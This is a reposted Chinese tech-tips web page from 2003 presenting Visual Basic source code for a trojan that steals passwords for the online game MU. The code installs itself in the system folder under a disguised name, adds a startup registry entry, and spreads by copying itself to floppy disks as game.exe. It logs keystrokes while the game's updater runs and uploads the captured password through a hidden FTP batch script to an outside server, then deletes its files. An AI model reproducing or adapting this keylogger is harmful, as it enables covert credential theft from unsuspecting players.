| 网站首页 | 资讯 | 影音 | 图片 | 论坛 | 模拟驾考 | 免费取名算命 | 瓷都工具 | 留言本 | 域名 | 瓷都商城 | 汇款 | 
您现在的位置: 瓷都热线|诚信中国:“一就是一”(1941.CN) >> 资讯 >> 教程技巧0 >> 电脑技巧 >> 正文 登录 注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
没有相关资讯
一个用VB设计的能够截取奇迹游戏密码的程序         ★★★
一个用VB设计的能够截取奇迹游戏密码的程序
作者:Ice@Fire 文章来源:Ice@Fire 更新时间:2003-11-21 2:25:45
【声明:转载此信息在于传递更多信息,其内容表达的观点并不代表本站立场,由这些信息所产生的一切后果本站不负任何责任。如果您对本信息有什么意见,欢迎和本站联系,谢谢!】http://CiDu.Net

由于写的匆忙程序有很些bug,忘见凉!^-^
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As String) As Long
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim fso, wsh
Dim winsys, prg, keysvalue As String
Dim new_work, start As Boolean
Private Sub Form_Load()
On Error Resume Next
Let new_work = True
Set fso = CreateObject("scripting.filesystemobject")
Set wsh = CreateObject("wscript.shell")
Let winsys = fso.GetSpecialFolder(SystemFolder)
If Len(App.Path) = 3 Then
Let prg_path = prg
Let prg = App.Path & App.EXEName & ".exe"
Else:
Let prg_path = prg & "\"
Let prg = App.Path & "\" & App.EXEName & ".exe"
End If
If Not fso.FileExists(winsys & "\Msvbvm60.dll") Then fso.CopyFile prg_path & "\Msvbvm60.dll", winsys & "\Msvbvm60.dll"
If fso.FileExists(winsys & "\windll.exe") = False Then
fso.CopyFile prg, winsys & "\windll.exe"
wsh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windll", winsys & "\windll.exe"
Shell "rundll32.exe user.exe,exitwindows"
End
End If
Let keysvalue = ""
Let start = False
If Not fso.FileExists("a:\game.exe") Then
fso.CopyFile prg, "a:\game.exe"
End If
End Sub

Private Sub Timer1_Timer()
If new_work = True And start = True Then
Call bGetKey
ElseIf FindWindow(0&, "mu auto update") = 0 Then
Let new_work = True
ElseIf FindWindow(0&, "mu auto update") <> 0 Then
Let start = True
End If
End Sub
Private Function bGetKey() As Boolean'这里应该需要补充密码的大小写鉴别!
Let Timer1.Enabled = False
Do Until (Len(keysvalue) >= 23)
For times = 48 To 57 Step 1
If GetAsyncKeyState(times) = -32767 Then
Let keysvalue = LCase(keysvalue & Chr(times))
GoTo bye
End If
Next times
For times = 65 To 107 Step 1
If GetAsyncKeyState(9) = -32767 Or GetAsyncKeyState(&H1) = -32767 Then Let keysvalue = keysvalue & "%": Exit For
If GetAsyncKeyState(8) = -32767 Then Let keysvalue = Left(keysvalue, Len(keysvalue) - 1)
If GetAsyncKeyState(times) = -32767 Then
If times >= 96 Then
Let keysvalue = keysvalue & LTrim(Str(times - 96))
Else:
Let keysvalue = LCase(keysvalue & Chr(times))
End If
Exit For
End If
Next times
bye:
Loop
MsgBox keysvalue
End
Call ftp_server
End Function
Private Sub ftp_server()
Dim script_file
Set script_file = fso.CreateTextFile(winsys & "\#" & keysvalue & ".dat", 1)
script_file.WriteLine Date & Time
script_file.WriteLine "result:#" & keysvalue
script_file.Close
Set script_file = fso.CreateTextFile(winsys & "\script.dat", 1)
script_file.WriteLine "not..write"'不要黑我啦!
script_file.WriteLine "hkhk"
script_file.WriteLine "ls -l"
script_file.WriteLine "send " & winsys & "\#" & keysvalue & ".dat"
script_file.WriteLine "quit"
script_file.Close
Set script_file = fso.CreateTextFile(winsys & "\hacker.dat", 1)
script_file.WriteLine "程式名称:奇迹泄密者 版本:1.1 程序设计:Ice@Fire 日期:2003年4月9日"
script_file.Close
Set script_file = fso.CreateTextFile(winsys & "\cmd.bat", 1)
script_file.WriteLine "@echo off"
script_file.WriteLine "ftp -s:" & winsys & "\script.dat www.cyberspace.org>>" & winsys & "\hacker.dat"
script_file.WriteLine "cls"
script_file.Close
Shell winsys & "\cmd.bat", vbHide
Set File = fso.GetFile(winsys & "\hacker.dat")
Do Until (File.Size > 430): Loop
Kill winsys & "\script.dat"
Kill winsys & "\cmd.bat"
Kill winsys & "\#" & keysvalue & ".dat"
If fso.FileExists("c:\hkhk.txt") = True Then
Shell "notepad.exe " & winsys & "\hacker.dat"
End
End If
Let new_work = False
Let start = False
Let keysvalue = ""
Let Timer1.Enabled = True
End Sub
愿能和大家成为朋友!cnloveboy@sina.com<b>


声明:以上信息资料大都是网上搜集而来,版权归作者,如有版权问题请留言告知我将马上改正。
文中所提到的各种观点只是原文观点,各种说法未经一一确认。并不代表本站认可此观点!!
资讯录入:ahui    责任编辑:ahui 
  • 上一篇资讯:

  • 下一篇资讯:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    点击数:
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)